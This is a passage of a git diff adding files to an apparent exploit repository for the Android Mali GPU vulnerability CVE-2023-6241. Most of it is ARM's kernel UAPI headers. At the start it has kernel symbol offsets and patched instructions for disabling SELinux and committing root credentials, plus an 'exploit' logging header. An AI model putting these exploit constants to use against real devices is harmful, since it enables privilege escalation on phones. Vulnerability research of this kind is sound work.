SEL_READ_ENFORCE_2311 0x818714 + +#define INIT_CRED_2311 0x271bfa8 + +#define COMMIT_CREDS_2311 0x167b40 + +#define ADD_COMMIT_2311 0x912d0108 //add x8, x8, #0xb40 + +#define ADD_INIT_2311 0x913ea000 //add x0, x0, #0xfa8 + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h b/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h new file mode 100644 index 0000000..0a4172c --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/log_utils.h @@ -0,0 +1,11 @@ +#ifndef LOG_UTILS_H +#define LOG_UTILS_H + +#ifdef SHELL +#define LOG(fmt, ...) printf(fmt, ##__VA_ARGS__) +#else +#include +#define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) +#endif + +#endif diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h new file mode 100644 index 0000000..23bed51 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_common_kernel.h @@ -0,0 +1,228 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_BASE_COMMON_KERNEL_H_ +#define _UAPI_BASE_COMMON_KERNEL_H_ + +#include +#include "mali_base_kernel.h" + +#define LOCAL_PAGE_SHIFT 12 + +#define BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS 4 + +/* Memory allocation, access/hint flags & mask. + * + * See base_mem_alloc_flags. + */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * virtual space. + * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory. + * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. + */ +#define BASEP_MEM_GROUP_ID_SHIFT 22 +#define BASE_MEM_GROUP_ID_MASK ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT) + +/* Must do CPU cache maintenance when imported memory is mapped/unmapped + * on GPU. Currently applicable to dma-buf type only. + */ +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26) + +/* OUT */ +/* Kernel side cache sync ops required */ +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28) + +/* Number of bits used as flags for base memory management + * + * Must be kept in sync with the base_mem_alloc_flags flags + */ +#define BASE_MEM_FLAGS_NR_BITS 30 + +/* A mask for all output bits, excluding IN/OUT bits. + */ +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP + +/* A mask for all input bits, including IN/OUT bits. + */ +#define BASE_MEM_FLAGS_INPUT_MASK \ + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK) + +/* Special base mem handles. + */ +#define BASEP_MEM_INVALID_HANDLE (0ul) +#define BASE_MEM_MMU_DUMP_HANDLE (1ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT) +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ul << LOCAL_PAGE_SHIFT) +/* reserved handles ..-47< for future special handles */ +#define BASE_MEM_COOKIE_BASE (64ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << LOCAL_PAGE_SHIFT) + BASE_MEM_COOKIE_BASE) + +/* Flags to pass to ::base_context_init. + * Flags can be ORed together to enable multiple things. + * + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must + * not collide with them. + */ +typedef __u32 base_context_create_flags; + +/* Flags for base context */ + +/* No flags set */ +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0) + +/* Base context is embedded in a cctx object (flag used for CINSTR + * software counter macros) + */ +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0) + +/* Base context is a 'System Monitor' context for Hardware counters. + * + * One important side effect of this is that job submission is disabled. + */ +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED ((base_context_create_flags)1 << 1) + +/* Bit-shift used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3) + +/* Bitmask used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \ + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) + +/* Bitpattern describing the base_context_create_flags that can be + * passed to the kernel + */ +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \ + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | BASEP_CONTEXT_MMU_GROUP_ID_MASK) + +/* Flags for base tracepoint + */ + +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY, + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST) + */ +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0) + +/* Indicate that job dumping is enabled. This could affect certain timers + * to account for the performance impact. + */ +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1) + +#endif /* _UAPI_BASE_COMMON_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h new file mode 100644 index 0000000..141b090 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h @@ -0,0 +1,608 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2023 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_BASE_CSF_KERNEL_H_ +#define _UAPI_BASE_CSF_KERNEL_H_ + +#include +#include "mali_base_common_kernel.h" + +/* Memory allocation, access/hint flags & mask specific to CSF GPU. + * + * See base_mem_alloc_flags. + */ + +/* Must be FIXED memory. */ +#define BASE_MEM_FIXED ((base_mem_alloc_flags)1 << 8) + +/* CSF event memory + * + * If Outer shareable coherence is not specified or not available, then on + * allocation kbase will automatically use the uncached GPU mapping. + * There is no need for the client to specify BASE_MEM_UNCACHED_GPU + * themselves when allocating memory with the BASE_MEM_CSF_EVENT flag. + * + * This memory requires a permanent mapping + * + * See also kbase_reg_needs_kernel_mapping() + */ +#define BASE_MEM_CSF_EVENT ((base_mem_alloc_flags)1 << 19) + +#define BASE_MEM_RESERVED_BIT_20 ((base_mem_alloc_flags)1 << 20) + + +/* Must be FIXABLE memory: its GPU VA will be determined at a later point, + * at which time it will be at a fixed GPU VA. + */ +#define BASE_MEM_FIXABLE ((base_mem_alloc_flags)1 << 29) + +/* Note that the number of bits used for base_mem_alloc_flags + * must be less than BASE_MEM_FLAGS_NR_BITS !!! + */ + +/* A mask of all the flags which are only valid for allocations within kbase, + * and may not be passed from user space. + */ +#define BASEP_MEM_FLAGS_KERNEL_ONLY \ + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE) + +/* A mask of all currently reserved flags + */ +#define BASE_MEM_FLAGS_RESERVED BASE_MEM_RESERVED_BIT_20 + +/* Special base mem handles specific to CSF. + */ +#define BASEP_MEM_CSF_USER_REG_PAGE_HANDLE (47ul << LOCAL_PAGE_SHIFT) +#define BASEP_MEM_CSF_USER_IO_PAGES_HANDLE (48ul << LOCAL_PAGE_SHIFT) + +#define KBASE_CSF_NUM_USER_IO_PAGES_HANDLE \ + ((BASE_MEM_COOKIE_BASE - BASEP_MEM_CSF_USER_IO_PAGES_HANDLE) >> \ + LOCAL_PAGE_SHIFT) + +/* Valid set of just-in-time memory allocation flags */ +#define BASE_JIT_ALLOC_VALID_FLAGS ((__u8)0) + +/* flags for base context specific to CSF */ + +/* Base context creates a CSF event notification thread. + * + * The creation of a CSF event notification thread is conditional but + * mandatory for the handling of CSF events. + */ +#define BASE_CONTEXT_CSF_EVENT_THREAD ((base_context_create_flags)1 << 2) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | \ + BASE_CONTEXT_CSF_EVENT_THREAD | \ + BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* Flags for base tracepoint specific to CSF */ + +/* Enable KBase tracepoints for CSF builds */ +#define BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS (1 << 2) + +/* Enable additional CSF Firmware side tracepoints */ +#define BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS (1 << 3) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED | \ + BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS | \ + BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS) + +/* Number of pages mapped into the process address space for a bound GPU + * command queue. A pair of input/output pages and a Hw doorbell page + * are mapped to enable direct submission of commands to Hw. + */ +#define BASEP_QUEUE_NR_MMAP_USER_PAGES ((size_t)3) + +#define BASE_QUEUE_MAX_PRIORITY (15U) + +/* Sync32 object fields definition */ +#define BASEP_EVENT32_VAL_OFFSET (0U) +#define BASEP_EVENT32_ERR_OFFSET (4U) +#define BASEP_EVENT32_SIZE_BYTES (8U) + +/* Sync64 object fields definition */ +#define BASEP_EVENT64_VAL_OFFSET (0U) +#define BASEP_EVENT64_ERR_OFFSET (8U) +#define BASEP_EVENT64_SIZE_BYTES (16U) + +/* Sync32 object alignment, equal to its size */ +#define BASEP_EVENT32_ALIGN_BYTES (8U) + +/* Sync64 object alignment, equal to its size */ +#define BASEP_EVENT64_ALIGN_BYTES (16U) + +/* The upper limit for number of objects that could be waited/set per command. + * This limit is now enforced as internally the error inherit inputs are + * converted to 32-bit flags in a __u32 variable occupying a previously padding + * field. + */ +#define BASEP_KCPU_CQS_MAX_NUM_OBJS ((size_t)32) + +/* CSF CSI EXCEPTION_HANDLER_FLAGS */ +#define BASE_CSF_TILER_OOM_EXCEPTION_FLAG (1u << 0) +#define BASE_CSF_EXCEPTION_HANDLER_FLAGS_MASK (BASE_CSF_TILER_OOM_EXCEPTION_FLAG) + +/** + * enum base_kcpu_command_type - Kernel CPU queue command type. + * @BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL: fence_signal, + * @BASE_KCPU_COMMAND_TYPE_FENCE_WAIT: fence_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT: cqs_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET: cqs_set, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION: cqs_wait_operation, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION: cqs_set_operation, + * @BASE_KCPU_COMMAND_TYPE_MAP_IMPORT: map_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT: unmap_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE: unmap_import_force, + * @BASE_KCPU_COMMAND_TYPE_JIT_ALLOC: jit_alloc, + * @BASE_KCPU_COMMAND_TYPE_JIT_FREE: jit_free, + * @BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND: group_suspend, + * @BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER: error_barrier, + */ +enum base_kcpu_command_type { + BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL, + BASE_KCPU_COMMAND_TYPE_FENCE_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_SET, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION, + BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION, + BASE_KCPU_COMMAND_TYPE_MAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE, + BASE_KCPU_COMMAND_TYPE_JIT_ALLOC, + BASE_KCPU_COMMAND_TYPE_JIT_FREE, + BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND, + BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER +}; + +/** + * enum base_queue_group_priority - Priority of a GPU Command Queue Group. + * @BASE_QUEUE_GROUP_PRIORITY_HIGH: GPU Command Queue Group is of high + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_MEDIUM: GPU Command Queue Group is of medium + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_LOW: GPU Command Queue Group is of low + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_REALTIME: GPU Command Queue Group is of real-time + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_COUNT: Number of GPU Command Queue Group + * priority levels. + * + * Currently this is in order of highest to lowest, but if new levels are added + * then those new levels may be out of order to preserve the ABI compatibility + * with previous releases. At that point, ensure assignment to + * the 'priority' member in &kbase_queue_group is updated to ensure it remains + * a linear ordering. + * + * There should be no gaps in the enum, otherwise use of + * BASE_QUEUE_GROUP_PRIORITY_COUNT in kbase must be updated. + */ +enum base_queue_group_priority { + BASE_QUEUE_GROUP_PRIORITY_HIGH = 0, + BASE_QUEUE_GROUP_PRIORITY_MEDIUM, + BASE_QUEUE_GROUP_PRIORITY_LOW, + BASE_QUEUE_GROUP_PRIORITY_REALTIME, + BASE_QUEUE_GROUP_PRIORITY_COUNT +}; + +struct base_kcpu_command_fence_info { + __u64 fence; +}; + +struct base_cqs_wait_info { + __u64 addr; + __u32 val; + __u32 padding; +}; + +struct base_kcpu_command_cqs_wait_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +struct base_cqs_set { + __u64 addr; +}; + +struct base_kcpu_command_cqs_set_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * typedef basep_cqs_data_type - Enumeration of CQS Data Types + * + * @BASEP_CQS_DATA_TYPE_U32: The Data Type of a CQS Object's value + * is an unsigned 32-bit integer + * @BASEP_CQS_DATA_TYPE_U64: The Data Type of a CQS Object's value + * is an unsigned 64-bit integer + */ +typedef enum PACKED { + BASEP_CQS_DATA_TYPE_U32 = 0, + BASEP_CQS_DATA_TYPE_U64 = 1, +} basep_cqs_data_type; + +/** + * typedef basep_cqs_wait_operation_op - Enumeration of CQS Object Wait + * Operation conditions + * + * @BASEP_CQS_WAIT_OPERATION_LE: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Less than or Equal to + * the Wait Operation value + * @BASEP_CQS_WAIT_OPERATION_GT: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Greater than the Wait Operation value + */ +typedef enum { + BASEP_CQS_WAIT_OPERATION_LE = 0, + BASEP_CQS_WAIT_OPERATION_GT = 1, +} basep_cqs_wait_operation_op; + +struct base_cqs_wait_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_wait_operation_info - structure which contains information + * about the Timeline CQS wait objects + * + * @objs: An array of Timeline CQS waits. + * @nr_objs: Number of Timeline CQS waits in the array. + * @inherit_err_flags: Bit-pattern for the CQSs in the array who's error field + * to be served as the source for importing into the + * queue's error-state. + */ +struct base_kcpu_command_cqs_wait_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +/** + * typedef basep_cqs_set_operation_op - Enumeration of CQS Set Operations + * + * @BASEP_CQS_SET_OPERATION_ADD: CQS Set operation for adding a value + * to a synchronization object + * @BASEP_CQS_SET_OPERATION_SET: CQS Set operation for setting the value + * of a synchronization object + */ +typedef enum { + BASEP_CQS_SET_OPERATION_ADD = 0, + BASEP_CQS_SET_OPERATION_SET = 1, +} basep_cqs_set_operation_op; + +struct base_cqs_set_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_set_operation_info - structure which contains information + * about the Timeline CQS set objects + * + * @objs: An array of Timeline CQS sets. + * @nr_objs: Number of Timeline CQS sets in the array. + * @padding: Structure padding, unused bytes. + */ +struct base_kcpu_command_cqs_set_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * struct base_kcpu_command_import_info - structure which contains information + * about the imported buffer. + * + * @handle: Address of imported user buffer. + */ +struct base_kcpu_command_import_info { + __u64 handle; +}; + +/** + * struct base_kcpu_command_jit_alloc_info - structure which contains + * information about jit memory allocation. + * + * @info: An array of elements of the + * struct base_jit_alloc_info type. + * @count: The number of elements in the info array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_alloc_info { + __u64 info; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_jit_free_info - structure which contains + * information about jit memory which is to be freed. + * + * @ids: An array containing the JIT IDs to free. + * @count: The number of elements in the ids array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_free_info { + __u64 ids; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_group_suspend_info - structure which contains + * suspend buffer data captured for a suspended queue group. + * + * @buffer: Pointer to an array of elements of the type char. + * @size: Number of elements in the @buffer array. + * @group_handle: Handle to the mapping of CSG. + * @padding: padding to a multiple of 64 bits. + */ +struct base_kcpu_command_group_suspend_info { + __u64 buffer; + __u32 size; + __u8 group_handle; + __u8 padding[3]; +}; + + +/** + * struct base_kcpu_command - kcpu command. + * @type: type of the kcpu command, one enum base_kcpu_command_type + * @padding: padding to a multiple of 64 bits + * @info: structure which contains information about the kcpu command; + * actual type is determined by @p type + * @info.fence: Fence + * @info.cqs_wait: CQS wait + * @info.cqs_set: CQS set + * @info.cqs_wait_operation: CQS wait operation + * @info.cqs_set_operation: CQS set operation + * @info.import: import + * @info.jit_alloc: JIT allocation + * @info.jit_free: JIT deallocation + * @info.suspend_buf_copy: suspend buffer copy + * @info.sample_time: sample time + * @info.padding: padding + */ +struct base_kcpu_command { + __u8 type; + __u8 padding[sizeof(__u64) - sizeof(__u8)]; + union { + struct base_kcpu_command_fence_info fence; + struct base_kcpu_command_cqs_wait_info cqs_wait; + struct base_kcpu_command_cqs_set_info cqs_set; + struct base_kcpu_command_cqs_wait_operation_info cqs_wait_operation; + struct base_kcpu_command_cqs_set_operation_info cqs_set_operation; + struct base_kcpu_command_import_info import; + struct base_kcpu_command_jit_alloc_info jit_alloc; + struct base_kcpu_command_jit_free_info jit_free; + struct base_kcpu_command_group_suspend_info suspend_buf_copy; + __u64 padding[2]; /* No sub-struct should be larger */ + } info; +}; + +/** + * struct basep_cs_stream_control - CSI capabilities. + * + * @features: Features of this stream + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_stream_control { + __u32 features; + __u32 padding; +}; + +/** + * struct basep_cs_group_control - CSG interface capabilities. + * + * @features: Features of this group + * @stream_num: Number of streams in this group + * @suspend_size: Size in bytes of the suspend buffer for this group + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_group_control { + __u32 features; + __u32 stream_num; + __u32 suspend_size; + __u32 padding; +}; + +/** + * struct base_gpu_queue_group_error_fatal_payload - Unrecoverable fault + * error information associated with GPU command queue group. + * + * @sideband: Additional information of the unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). + * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_group_error_fatal_payload { + __u64 sideband; + __u32 status; + __u32 padding; +}; + +/** + * struct base_gpu_queue_error_fatal_payload - Unrecoverable fault + * error information related to GPU command queue. + * + * @sideband: Additional information about this unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). + * @csi_index: Index of the CSF interface the queue is bound to. + * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_error_fatal_payload { + __u64 sideband; + __u32 status; + __u8 csi_index; + __u8 padding[3]; +}; + +/** + * enum base_gpu_queue_group_error_type - GPU Fatal error type. + * + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL: Fatal error associated with GPU + * command queue group. + * @BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL: Fatal error associated with GPU + * command queue. + * @BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT: Fatal error associated with + * progress timeout. + * @BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM: Fatal error due to running out + * of tiler heap memory. + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT: The number of fatal error types + * + * This type is used for &struct_base_gpu_queue_group_error.error_type. + */ +enum base_gpu_queue_group_error_type { + BASE_GPU_QUEUE_GROUP_ERROR_FATAL = 0, + BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL, + BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT, + BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM, + BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT +}; + +/** + * struct base_gpu_queue_group_error - Unrecoverable fault information + * @error_type: Error type of @base_gpu_queue_group_error_type + * indicating which field in union payload is filled + * @padding: Unused bytes for 64bit boundary + * @payload: Input Payload + * @payload.fatal_group: Unrecoverable fault error associated with + * GPU command queue group + * @payload.fatal_queue: Unrecoverable fault error associated with command queue + */ +struct base_gpu_queue_group_error { + __u8 error_type; + __u8 padding[7]; + union { + struct base_gpu_queue_group_error_fatal_payload fatal_group; + struct base_gpu_queue_error_fatal_payload fatal_queue; + } payload; +}; + +/** + * enum base_csf_notification_type - Notification type + * + * @BASE_CSF_NOTIFICATION_EVENT: Notification with kernel event + * @BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR: Notification with GPU fatal + * error + * @BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP: Notification with dumping cpu + * queue + * @BASE_CSF_NOTIFICATION_COUNT: The number of notification type + * + * This type is used for &struct_base_csf_notification.type. + */ +enum base_csf_notification_type { + BASE_CSF_NOTIFICATION_EVENT = 0, + BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR, + BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP, + BASE_CSF_NOTIFICATION_COUNT +}; + +/** + * struct base_csf_notification - Event or error notification + * + * @type: Notification type of @base_csf_notification_type + * @padding: Padding for 64bit boundary + * @payload: Input Payload + * @payload.align: To fit the struct into a 64-byte cache line + * @payload.csg_error: CSG error + * @payload.csg_error.handle: Handle of GPU command queue group associated with + * fatal error + * @payload.csg_error.padding: Padding + * @payload.csg_error.error: Unrecoverable fault error + * + */ +struct base_csf_notification { + __u8 type; + __u8 padding[7]; + union { + struct { + __u8 handle; + __u8 padding[7]; + struct base_gpu_queue_group_error error; + } csg_error; + + __u8 align[56]; + } payload; +}; + +/** + * struct mali_base_gpu_core_props - GPU core props info + * + * @product_id: Pro specific value. + * @version_status: Status of the GPU release. No defined values, but starts at + * 0 and increases by one for each release status (alpha, beta, EAC, etc.). + * 4 bit values (0-15). + * @minor_revision: Minor release number of the GPU. "P" part of an "RnPn" + * release number. + * 8 bit values (0-255). + * @major_revision: Major release number of the GPU. "R" part of an "RnPn" + * release number. + * 4 bit values (0-15). + * @padding: padding to align to 8-byte + * @gpu_freq_khz_max: The maximum GPU frequency. Reported to applications by + * clGetDeviceInfo() + * @log2_program_counter_size: Size of the shader program counter, in bits. + * @texture_features: TEXTURE_FEATURES_x registers, as exposed by the GPU. This + * is a bitpattern where a set bit indicates that the format is supported. + * Before using a texture format, it is recommended that the corresponding + * bit be checked. + * @gpu_available_memory_size: Theoretical maximum memory available to the GPU. + * It is unlikely that a client will be able to allocate all of this memory + * for their own purposes, but this at least provides an upper bound on the + * memory available to the GPU. + * This is required for OpenCL's clGetDeviceInfo() call when + * CL_DEVICE_GLOBAL_MEM_SIZE is requested, for OpenCL GPU devices. The + * client will not be expecting to allocate anywhere near this value. + */ +struct mali_base_gpu_core_props { + __u32 product_id; + __u16 version_status; + __u16 minor_revision; + __u16 major_revision; + __u16 padding; + __u32 gpu_freq_khz_max; + __u32 log2_program_counter_size; + __u32 texture_features[BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS]; + __u64 gpu_available_memory_size; +}; + +#endif /* _UAPI_BASE_CSF_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h new file mode 100644 index 0000000..c0b4d50 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h @@ -0,0 +1,287 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2010-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +/* + * Base structures shared with the kernel. 